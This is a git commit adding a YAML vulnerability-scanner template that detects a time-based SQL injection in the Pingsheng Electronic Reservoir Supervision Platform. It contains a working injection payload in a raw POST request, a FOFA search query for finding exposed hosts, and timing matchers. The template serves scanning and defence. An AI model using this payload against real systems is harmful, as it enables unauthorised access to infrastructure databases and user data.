add pingsheng sqli
parent
072aeb90e5
commit
849b0a88b4
|
@ -0,0 +1,33 @@
|
||||||
|
id: pingsheng-electronic-sqli
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Pingsheng Electronic Reservoir Supervision Platform - Sql Injection
|
||||||
|
author: securityforeveryone
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
There is a SQL injection vulnerability in the GetAllRechargeRecordsBySIMCardId interface of Pingsheng Electronic Reservoir Supervision Platform. Attackers can access data in the database without authorization, thereby stealing user data and causing user information leakage.
|
||||||
|
reference:
|
||||||
|
- https://github.com/wy876/POC/blob/main/%E5%B9%B3%E5%8D%87%E7%94%B5%E5%AD%90%E6%B0%B4%E5%BA%93%E7%9B%91%E7%AE%A1%E5%B9%B3%E5%8F%B0GetAllRechargeRecordsBySIMCardId%E6%8E%A5%E5%8F%A3%E5%A4%84%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
fofa-query: "js/PSExtend.js"
|
||||||
|
tags: sqli,pingsheng
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
@timeout 20s
|
||||||
|
POST /WebServices/SIMMaintainService.asmx/GetAllRechargeRecordsBySIMCardId HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
loginIdentifer=&simcardId=';WAITFOR DELAY '0:0:6'--
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'duration>=6'
|
||||||
|
- 'contains_all(body,"Result","false","Message","?xml version")'
|
||||||
|
- 'status_code == 200'
|
||||||
|
condition: and
|
Loading…
Reference in New Issue